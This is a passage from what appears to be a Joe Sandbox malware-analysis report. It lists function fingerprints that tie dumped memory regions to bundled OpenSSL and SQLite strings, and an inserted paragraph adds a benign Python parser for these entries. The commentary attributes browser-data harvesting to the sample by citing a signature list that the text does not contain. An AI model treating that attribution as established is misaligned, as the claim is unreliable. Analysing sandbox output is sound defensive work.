                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                      • API String ID: 3568877910-446233508
                                                                                                                                                                      • Opcode ID: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
                                                                                                                                                                      • Instruction ID: 45117cab23ac80a217e8914682ef10f9ceaa197601273edf83eb574d953b3826
                                                                                                                                                                      • Opcode Fuzzy Hash: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 36E18C65A1C68382EA62EB11D5406FE6794EF89B84F445036EF4D47BAADF7CE601C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID:
• String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
• API String ID: 0-3733955532
• Opcode ID: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
• Instruction ID: 37f38c1f942aec2154e86cb05c5707d7b8651dc7fd8d112c5d309688ab6b9789
• Opcode Fuzzy Hash: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
• Instruction Fuzzy Hash: DA029E23B09A8286EF158B11E464B7973A0FF45B94F984275DE7EC62E8DF3CE5448740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
• API String ID: 3568877910-1794268454
• Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
• Instruction ID: 0065794922b25a2268de227e282ccb81d07cc35f45b9455881e4f7d32ea2efe7
• Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
• Instruction Fuzzy Hash: E6A14C26A1AB8291EA86DF25C4507B86360FB85B88F185535EF4D473A9EF3CE295C310
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2037809311.00007FFDFAC71000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAC70000, based on PE: true
• Associated: 00000001.00000002.2037779023.00007FFDFAC70000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFACD2000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD1E000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD21000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD26000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD83000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD85000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD88000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038143865.00007FFDFAD89000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfac70000_mei.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
• Instruction ID: 6d41bfca3e526d5b5da0435f5526b126ae0ae5f7842697384b188e223198074a
• Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
• Instruction Fuzzy Hash: 7381CE69F0C24786FB6CAB66B861A7D62D0EF45780F5880B5D96C473DEDE3CE8458700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
• API String ID: 817585512-554953066
• Opcode ID: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
• Instruction ID: c409165feee8b557b21a02056ce6a029248ff30a625b48f53b3a390168521114
• Opcode Fuzzy Hash: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
• Instruction Fuzzy Hash: 52325773F08B818AEB64CF259460AAD27A4FB48B88F504236DAAD5779DDF38E450C740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: new[]
• String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
• API String ID: 4059295235-3840279414
• Opcode ID: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
• Instruction ID: a152f86856f5b91f7860183a0f75a844ca566fd522693d94e9111c80fd4d9405
• Opcode Fuzzy Hash: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
• Instruction Fuzzy Hash: 5051AF22F0828255FB259F62A421EB56791AF45B8CF480235DE7E976DEDF3CE445C380
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
• API String ID: 0-1087561517
• Opcode ID: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
• Instruction ID: edc1765ed8c252529d4d345e8b6291331315dac91eee414e483644e46d2062d8
• Opcode Fuzzy Hash: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
• Instruction Fuzzy Hash: 81D18A65B1864391FB62AB62D8543FE23A5AF89784F149032DF0E47BEEDE3DE4458310
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID:
                                                                                                                                                                      • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                      • API String ID: 0-2528746747
                                                                                                                                                                      • Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                      • Instruction ID: bbaf628345676747c86bbcb3ee5dee435404ca6e77ec740004c3fa315ced874e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                      • Instruction Fuzzy Hash: B8B18D61B18A4299FB12EB61D8801FD2BA5EF45B84F504032EB4D47BBDDE3CE64AC351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 817585512-3764764234
                                                                                                                                                                      • Opcode ID: 1de547da237458ceaab650ade48cbe0b9da18c493a7469da66f36deaac9f7ff1
                                                                                                                                                                      • Instruction ID: 93ceadc6b656e222786c1ca0afe9d1a587ae5cba434c5d33698be369afa788e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1de547da237458ceaab650ade48cbe0b9da18c493a7469da66f36deaac9f7ff1
                                                                                                                                                                      • Instruction Fuzzy Hash: A5D18933B08686C6D764CF26E024AA977A5FB88B84F45823ADF6D47799DF39D441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00007FFDFF1F37CC
                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFF1F34DE
                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFF1F34B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                      • API String ID: 817585512-272990098
                                                                                                                                                                      • Opcode ID: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                      • Instruction ID: a137e65c977d5d28c72aac5319c4155a59804ddabc5136b9b6a7585124a1aade
                                                                                                                                                                      • Opcode Fuzzy Hash: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                      • Instruction Fuzzy Hash: 90D1CC63F09BC182EB648B169064ABA6BA1EB44B94F444331DE7E6B7D9DF3DE441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • 00007FFE1A4519C0.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00000000,?,?,00000000,00007FFDFF21685C,?,?,?), ref: 00007FFDFF216030
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                      • API String ID: 817585512-2903559916
                                                                                                                                                                      • Opcode ID: 3964bb9d76b9709d91abe0438d4a6b0c6ce0710c928f65d29acdb2c4f22bfa5b
                                                                                                                                                                      • Instruction ID: 654a69cc38d2592e427caaa32c96307ef219a27ba3912f19524a9b47092a5167
                                                                                                                                                                      • Opcode Fuzzy Hash: 3964bb9d76b9709d91abe0438d4a6b0c6ce0710c928f65d29acdb2c4f22bfa5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 75C1B822B08682A5EB658B159464BBE6BA1FB44B98F488335DE7DC77C9DF3CE401C304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: "%w" $%Q%s
                                                                                                                                                                      • API String ID: 817585512-1987291987
                                                                                                                                                                      • Opcode ID: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                      • Instruction ID: a095a881309896fbc7eff46f1deb9822eb31b8967d20e442bca5b368a9781435
                                                                                                                                                                      • Opcode Fuzzy Hash: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                      • Instruction Fuzzy Hash: 16C1BF32B18A8286EB14CF15A460AB977A1FB85BA4F944335DE7E877D9DF3CE4408300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 817585512-3764764234
                                                                                                                                                                      • Opcode ID: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                      • Instruction ID: dd533f1a6f6416b1e94dd3477ba28769e9690cfc2604b3deb83c474386b2dcc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                      • Instruction Fuzzy Hash: 75B1BE33B08696C6D764CF65A0A4AAA77A5FB44784F014235DF6D87BC9DF3AE450C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

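The entries above are per-function fingerprints from the Joe Sandbox IDA plugin: each ties one dumped memory region (the Source File and its base Offset) to the strings and call sites referenced from that function, plus opcode and instruction fuzzy hashes for similarity matching. Read as a group they identify which bundled library each region is: the ..\s\ssl\ssl_rsa.c and SSL_CTX_use_serverinfo_file strings at base 00007FFE00310000 are OpenSSL's, and the "database corruption", foreign-key and rowid messages at base 00007FFDFF190000 are SQLite's, which is consistent with the browser-data harvesting flagged in the signature list (Chromium stores credentials and history in SQLite files). The parser below is an added example, not part of this report or of Joe Sandbox's tooling. It reads entries in this layout from a constructed sample (three entries copied from above and trimmed), groups strings by image base, strips the "Download File" link label that HTML extraction left on the Associated lines, and rebases xref and call-site addresses to image-relative offsets so they can be looked up in the downloaded dump. Field semantics are assumed from the visible text only: the Offset value is taken as the image base and "$" as the report's string separator.

```python
"""Parse Joe Sandbox function-signature entries and group them by image base.
Added example; record layout inferred from the visible report text only."""
import re
from collections import defaultdict

# Constructed sample: three entries copied from the report, trimmed to the
# lines the parser needs. One Associated line keeps its extraction residue.
SAMPLE = r"""
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
• API String ID: 0-2528746747
• Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 00007FFDFF1F37CC
• foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFF1F34B5
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
Similarity
• API ID: 00007A4519
• String ID: foreign key on %s should reference only one column of table %T$unknown column "%s" in foreign key definition
• Opcode ID: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
Uniqueness

Uniqueness Score: -1.00%

APIs
• 00007FFE1A4519C0.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00000000,?,?,00000000,00007FFDFF21685C,?,?,?), ref: 00007FFDFF216030
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Similarity
• API ID: 00007A4519
• String ID: %.*z:%u$column%d$rowid
• Opcode ID: 3964bb9d76b9709d91abe0438d4a6b0c6ce0710c928f65d29acdb2c4f22bfa5b
Uniqueness

Uniqueness Score: -1.00%
"""

SOURCE_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
API_RE = re.compile(r"^• ([0-9A-Fa-f]+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
XREF_RE = re.compile(r"^• (.+), xrefs: ([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^• ([A-Za-z ]+): ?(.*)$")


def parse_entries(text):
    """Return one dict per entry; an entry ends at its 'Uniqueness Score' line."""
    entries, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if (m := SOURCE_RE.match(line)):
            cur["source"] = m.group(1)
            cur["base"] = int(m.group(2), 16)  # assumed: Offset is the image base
            cur["is_pe"] = m.group(3) == "true"
        elif (m := API_RE.match(line)):  # (callee, callee address, call site)
            cur.setdefault("apis", []).append((m.group(2), int(m.group(1), 16), int(m.group(4), 16)))
        elif (m := XREF_RE.match(line)):  # (string, address referencing it)
            cur.setdefault("xrefs", []).append((m.group(1), int(m.group(2), 16)))
        elif (m := FIELD_RE.match(line)):
            key, val = m.group(1), m.group(2).strip()
            if key == "String ID":  # '$' separates strings in the report
                cur["strings"] = [s.strip() for s in val.split("$") if s.strip()]
            elif key == "API ID":
                cur["api_ids"] = val.split()
            elif key == "Associated":  # drop the link label left by HTML extraction
                cur.setdefault("associated", []).append(val.removesuffix("Download File"))
            else:
                cur[key.lower().replace(" ", "_")] = val
        elif line.startswith("Uniqueness Score:"):
            cur["uniqueness"] = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur = {}
    return entries


def strings_by_base(entries):
    """Map each dumped image base to the set of strings attributed to it."""
    out = defaultdict(set)
    for e in entries:
        out[e["base"]].update(e.get("strings", []))
    return dict(out)


def to_rva(entry):
    """Rebase xref and call-site addresses to image-relative offsets (RVAs)."""
    base = entry["base"]
    return {
        "xrefs": [(s, addr - base) for s, addr in entry.get("xrefs", [])],
        "calls": [(name, ref - base) for name, _callee, ref in entry.get("apis", [])],
    }


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for base, strs in sorted(strings_by_base(parsed).items()):
        print(f"{base:#018x}: {sorted(strs)}")
    print(to_rva(parsed[1]))
```

Feed it the text of a full report section and the per-base string sets make the library attribution obvious at a glance; the RVAs are what you need when opening the associated .sdmp files in a disassembler, since the dump is the same image with its runtime base subtracted.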
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
